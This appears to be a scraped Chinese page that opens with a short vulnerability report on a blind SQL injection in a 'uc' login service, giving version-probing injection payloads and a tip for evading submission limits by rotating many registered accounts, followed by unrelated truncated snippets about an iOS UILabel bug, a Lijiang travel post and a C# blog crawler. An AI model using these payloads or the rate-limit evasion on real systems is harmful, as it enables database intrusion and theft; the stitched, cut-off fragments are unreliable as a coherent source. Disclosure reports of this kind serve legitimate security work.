盲注,需要登入,而且不能頻繁提交,沒深入測試,太蛋痛
漏洞證明:真做簡單測試,太蛋痛了,不過這可以整個uc的庫;
登入uc後,抓到uid和tgt然後提交
'%20and%20substring(@@version,1,1)=5%20and%20'1'='1
'%20and%20substring(@@version,1,1)=4%20and%20'1'='1
據此判斷出是mysql5的資料庫
如果想要突破提交限制,可以註冊大量的uc賬號,乙個賬號的tgt提交三次請求,輪流提交
修復方案:
加強過濾
作者 xnet
UILabel 的乙個蛋疼問題
在ios8以下版本,numberoflines設定為0,編譯警告automatic preferred max layout width before ios8.0,同時不能換行。ios8以下版本,要 uilabel 行數大於0,單numberoflines設定為0是不行的,還需要指定preferr...
麗江,乙個未完成的痛
每天都在網上,這已經成了我的生活,知道西塘,是在天涯,無論哪個 只要有旅遊休閒我一定會去。天涯也一樣,並不是每乙個地方我們每乙個人都能去的,我選擇去了西塘,這個是我能夠達到的。隨著去天涯的的時間越來越多,麗江這個詞眼出現的頻率也越來越大,越出現心中越有一種隱隱的痛,到底什麼時候才能完成這樣乙個旅行呢...
寫了乙個新浪部落格的爬蟲
語言 c 用到的第三方庫 軟體介面 由於原理非常簡單,花了乙個小時寫了一下,直接上 using system using system.io using system.net using system.text using system.text.regularexpressions using s...